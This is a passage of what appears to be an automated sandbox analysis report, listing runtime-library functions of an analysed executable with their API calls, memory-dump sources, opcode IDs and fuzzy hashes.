                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bb3e10cf4a35a220824289bb01a2f88b9d55ce459b8c5ab180e83745805aebfa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9fad3fd2c59410616fd224fb201575ebce4d49ecdabef750df45e43d23bb9d40
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb3e10cf4a35a220824289bb01a2f88b9d55ce459b8c5ab180e83745805aebfa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2901B5322086929DA63726B67C8EF56265DEB05778B37032EF110D91E1EF914C00A341
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D0969 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AFD2407A,?,?,00000000,003E22F7,000000FF,?,003D08F9,?,?,003D08CD,00000000), ref: 003D099E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003D09B0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,003E22F7,000000FF,?,003D08F9,?,?,003D08CD,00000000), ref: 003D09D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                  • Opcode ID: 502354518243eb49e54d70dc5226758a6099fa9f0c0ffa6fa2a386f6b26c84bc
                                                                                                                                                                                                                                                                                                  • Instruction ID: c522b2b70d70d655bb07afdd9bad6c881837608c1cd0c8ccc19afb94e48897fc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 502354518243eb49e54d70dc5226758a6099fa9f0c0ffa6fa2a386f6b26c84bc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A0184329446A5AFDB278B51DC49BAEBBBCFB04B14F040626F811A62E0DB749D00CA90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C36B0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C36BC
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C36CF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C3702
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C3718
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C3723
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 15fa5e063b93a27f298915ba141677fa1f457d373a2dcaf143629324740b31f8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3197986cf05aadee243b60b3f148fec1bb03c0e8987025b8f0e8a40e0575ef9e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15fa5e063b93a27f298915ba141677fa1f457d373a2dcaf143629324740b31f8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1701F7B3A00114ABCB16AB64D945EAD7BB8DF81360B15415CF805DF281EF30AF02D790
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C2F91 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C2F9D
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C2FB0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C2FE3
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C2FF9
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C3004
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d23087bb8857f3da874ab0328c18b48f9a71802905cb515a3156062a221b7d47
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c096db6ce436b7224daa41eb93c18e304a1cd89dfc7e4879253b63b124dc5f7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d23087bb8857f3da874ab0328c18b48f9a71802905cb515a3156062a221b7d47
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901A772A00118BBCB16AB64D805EAE7BB8DF81760B11415DF901DF291DF349F42D794
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C34E8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C34F5
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C3508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C353B
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C3551
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C355C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f09e4e5691fd067b43d41e8dd666428da8d8558ca80d03198c33bfbbe99b75d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4eabf6ec25cac47966384c09fee035b7cf356503ff9d6212baf80b089f728bcd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f09e4e5691fd067b43d41e8dd666428da8d8558ca80d03198c33bfbbe99b75d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC018F76A00118ABCB16BF649805EADBBB89F81720F11815DF911EF291EB34EF029794
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C41DA Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 156189095-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 223dc809d0434246ad61906102db8bb5800ece15833be086d7f54b76ca7cdee3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81ba93b46d83266e8db7a19b9861455fba1da91f9bcfb27ac485c01e6698770b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 223dc809d0434246ad61906102db8bb5800ece15833be086d7f54b76ca7cdee3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB017C7AA001619BCB1BEF21E8A6E7D7B75BFC4300B58401CE9119B381DB74AE42CBC5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00409321 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040932D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __getptd_noexit.LIBCMT ref: 00409507
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409504: __amsg_exit.LIBCMT ref: 00409514
                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00409344
                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00409352
                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00409362
                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00409376
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0fe02cc9438ab2e92985c4cbaa4f295a014792721979d0f176db66117a5a733d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f91ba9bedf3c5c3e06822bad6736f6dc70f95f56669a878c1380514a39628d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe02cc9438ab2e92985c4cbaa4f295a014792721979d0f176db66117a5a733d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F06D32A05710AADB25BBB65803B4A32A06B44729F65412FF940B72D3CA3C5D41CE9E
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003CA212 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003CA1C3,00000000,?,004230A4,?,?,?,003CA366,00000004,InitializeCriticalSectionEx,003E5BD8,InitializeCriticalSectionEx), ref: 003CA21F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,003CA1C3,00000000,?,004230A4,?,?,?,003CA366,00000004,InitializeCriticalSectionEx,003E5BD8,InitializeCriticalSectionEx,00000000,?,003CA11D), ref: 003CA229
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 003CA251
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                                  • Opcode ID: e2bbfa1b52fc818ae87962d740d2a5af962f466a63153cf62e32865478877fe2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 20f1112dcd77ef131ada081ed1b9a67efc26124ea574ce03fbd5f02dd500c279
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2bbfa1b52fc818ae87962d740d2a5af962f466a63153cf62e32865478877fe2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE01A31280648BBEF222BA1ED46F593F58AF44B54F110534FB0CEC0E1E7A29D10A685
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D6CF8 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(AFD2407A,00000000,00000000,00000000), ref: 003D6D5B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003D6FB6
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003D6FFE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 003D70A1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4cce67ae21b3272b34c3bcd0c227c94f86bd5646e05a09567f575f2b91aafcf1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4da8470558e66db6c529210a25dfb9b9e5eaa733dbbd2b421c3f8d9de2aa9bb0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cce67ae21b3272b34c3bcd0c227c94f86bd5646e05a09567f575f2b91aafcf1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD16EB6E042589FCF16CFA8E8809EDBBB5FF48304F14456AE455EB391E730A945CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C91E1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a83382fa6f69b6b278000cf2c8002b93b3bbb63bc004a520bff9092b48f88004
                                                                                                                                                                                                                                                                                                  • Instruction ID: f859061e187bfacc1fbecfc86c9c8f46ab545c59045ec176db4ffd012b384506
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a83382fa6f69b6b278000cf2c8002b93b3bbb63bc004a520bff9092b48f88004
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B851D076A00246AFDB278F10D889FBA77A4EF44310F16452EE842CB5A1E731EC41CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D8E8E Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D8A72: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003D8584,?,00000000,-00000008), ref: 003D8B1E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 003D8EF2
                                                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 003D8EF9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 003D8F33
                                                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 003D8F3A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
